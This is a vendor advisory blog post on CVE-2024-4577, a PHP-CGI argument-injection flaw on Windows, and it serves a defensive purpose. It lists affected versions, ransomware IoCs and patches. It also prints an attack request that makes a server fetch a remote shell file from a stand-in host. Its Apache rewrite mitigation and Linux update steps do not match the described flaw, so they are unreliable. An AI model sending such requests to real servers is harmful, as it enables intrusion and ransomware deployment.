Get a demo

Voyager18 (research)

Understanding and Mitigating CVE-2024-4577

CVE-2024-4577 affects users of PHP on Windows and can cause challenges for those who don't take the necessary mitigation steps. Here's more.

Yair Divinsky | June 30, 2024

CVE-2024-4577 is a critical remote code execution (RCE) vulnerability in PHP on Windows, identified by the security research team at DEVCORE. This vulnerability has the potential to allow attackers to execute arbitrary code on a remote server, posing significant risks to millions of websites that rely on PHP for their backend operations.

Here’s what you need to know:

TL;DR

Affected products: 

Web servers running PHP in CGI mode 

Product category: 

Web Server 

Severity: 

Critical 

Type: 

Remote Code Execution (RCE) 

Impact: 

Unauthorized command execution on the server, Potential for full system compromise 

Deployment of ransomware (e.g., Tellyouthepass) 

PoC: 

Link 

Exploit in the wild 

Yes – Tellyouthepass ransomware group 

CISA Catalog 

 Yes

Remediation action 

Apply latest patches provided by the PHP development team 

MITRE advisory 

Read more 

 

CVE-2024-4577 is a remote code execution (RCE) vulnerability affecting PHP installations on Windows operating systems. The vulnerability has recently come under the spotlight due to its exploitation in widespread attacks, particularly involving the Tellyouthepass ransomware. 

Discovered by Orange Tsai, a researcher at Devcore, The Critical RCE vulnerability in the PHP CGI (Common Gateway Interface) allows attackers to inject arbitrary arguments into PHP processes, leading to unauthorized command execution on the server. This vulnerability affects all versions of PHP for Windows, posing a significant risk to web servers that run PHP in CGI mode. 

The flaw vulnerability arises from an issue in the encoding conversion process, specifically within the ‘Best-Fit’ feature of PHP on Windows. The problem is linked to the handling of certain character sequences that can bypass protections meant to prevent exploitation of a previous vulnerability (CVE-2012-1823). 

The vulnerability allows an attacker to craft a specially formatted HTTP request that can inject arguments into the PHP-CGI executable. Improper handling of query parameters in CGI mode, might give attackers the ability to manipulate the input to execute malicious commands.

This injection can lead to arbitrary code execution on the server, thereby compromising the integrity, confidentiality, and availability of the affected systems. For example, an attacker might exploit this by sending a specially crafted request to the server, forcing the server to include and execute a remote file, allowing the attacker to gain control over the system: 

GET /index.php?-d+allow_url_include%3dOn+-d+auto_prepend_file%3dhttp://malicious-server.com/shell.txt HTTP/1.1 Host: vulnerable-site.com 

The affected versions of PHP are: 

  • PHP 8.3 (versions prior to 8.3.8) 
  • PHP 8.2 (versions prior to 8.2.20) 
  • PHP 8.1 (versions prior to 8.1.29) 

Does CVE-2024-4577 affect me?

CVE-2024-4577 affects any web server running PHP in CGI mode running on Windows that has not been updated with the latest security patches, due to the nature of the encoding conversion issue.  

If you are running a PHP environment on a Windows server, you are potentially vulnerable to CVE-2024-4577, especially if you are using PHP versions mentioned above. Websites and applications that depend on PHP for their server-side scripting are at risk, making it imperative for administrators and developers to determine their exposure and take appropriate actions. 

The key factors determining whether you are affected include: 

  • Any installation of PHP prior to the patched versions (8.3.8, 8.2.20, and 8.1.29) is vulnerable. 
  • Review your web server configuration to see if PHP is running in CGI mode. 
  • Environments configured to use PHP-CGI are particularly at risk as the vulnerability
  • exploits argument injection in the CGI mode. 

If your setup matches these criteria, your systems are at risk, and immediate action is required to mitigate the threat. 

IoCs

  • URL: hxxp:/88.218.76[.]13/dd3.hta
  • C2 IP: 88.218.76[.]13
  • Hash (HTA sample): 95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3
  • Hash (HTA sample): 5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618
  • Hash Extracted .NET binary: 9562AD2C173B107A2BAA7A4986825B52E881A935DEB4356BF8B80B1EC6D41C53
  • Bitcoin Wallet address: bc1qnuxx83nd4keeegrumtnu8kup8g02yzgff6z53l

Vulnerability trends

Has CVE-2024-4577 been actively exploited in the wild?

Yes, there have been reports of active exploitation attempts of CVE-2024-4577. Shortly after the vulnerability was disclosed, discussions and proof-of-concept (PoC) exploits began circulating in various hacker forums and platforms. Security researchers from DEVCORE, who discovered the vulnerability, have noted that the technical details and PoC code are already being used to target vulnerable systems. 

According to a detailed technical analysis by Watchtowr Labs, the vulnerability has been leveraged by the Tellyouthepass ransomware group to compromise and control vulnerable servers. BleepingComputer reported that this ransomware campaign has quickly weaponized the flaw to breach servers and encrypt data, leading to significant disruptions for affected organizations. 

Additionally, Censys observed a spike in scanning activity targeting this vulnerabilityfixes, indicating widespread interest and exploitation attempts by malicious actors. This underscores the urgency of addressing this vulnerability promptly. 

Given the critical nature of the vulnerability and the widespread use of PHP, the risk of exploitation is high. Attackers can leverage this vulnerability to gain control over affected servers, deploy malware, steal sensitive data, and disrupt services. 

 

How to fix CVE-2024-4577

As shown in DEVCORE’s research and disclosure of this vulnerability, CVE-2024-4577 is a critical vulnerability that demands immediate attention from PHP administrators and developers. To protect your systems from CVE-2024-4577, it is crucial to take immediate action by following these steps with necessary measures to mitigate this vulnerability: 

Update PHP

The primary and most effective mitigation is to upgrade PHP to the latest versions that contain the patches for CVE-2024-4577. The PHP development team has released fixes in the recent changelog for PHP 8 addressing this issue, ensure that your PHP installation is updated to one of the following versions: 

  • PHP 8.3.8 or later 
  • PHP 8.2.20 or later 
  • PHP 8.1.29 or later 

Updating PHP can be done by downloading the latest version from the official PHP website. 

# On Linux systems, update PHP via your package manager 

sudo apt-get update 

sudo apt-get install php 

# On Windows, download the latest PHP binaries from the official PHP website and replace your current installation 

Disable PHP in CGI mode

If possible, configure your web server to avoid running PHP in CGI mode. Instead, use PHP-FPM (FastCGI Process Manager) or mod_php with Apache for better security and performance. 

Implement temporary mitigations:

Use a WAF to filter and block malicious requests targeting the vulnerability. Imperva provides solutions to protect against such exploits. 

If immediate updating is not feasible, temporary mitigations can help reduce the risk. These include: 

  • Web Server Configurations: Adjust web server configurations to block specific attack vectors. For example, in Apache, you can add rewrite rules to prevent the injection of malicious arguments: 

RewriteEngine On 

RewriteCond %{QUERY_STRING} ^(.*)(%0d|%0a|%0D|%0A)(.*)$ [NC] 

RewriteRule .* – [F] 

 

Next steps

Each new vulnerability is a reminder of where we stand and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors: 

  1. Q1 2024 Vulnerability Watch
  2. The MITRE ATT&CK framework: Getting started
  3. The true impact of exploitable vulnerabilities for 2024
  4. Multi-cloud security challenges – a best practice guide
  5. How to properly tackle zero-day threats

Free for risk owners

Set up in minutes to aggregate and prioritize cyber risk across all your assets and attack vectors.

“The only free RBVM tool out there The only free RBVM tool lorem ipsum out there. The only”.

Name Namerson
Head of Cyber Security Strategy

strip-img-2.png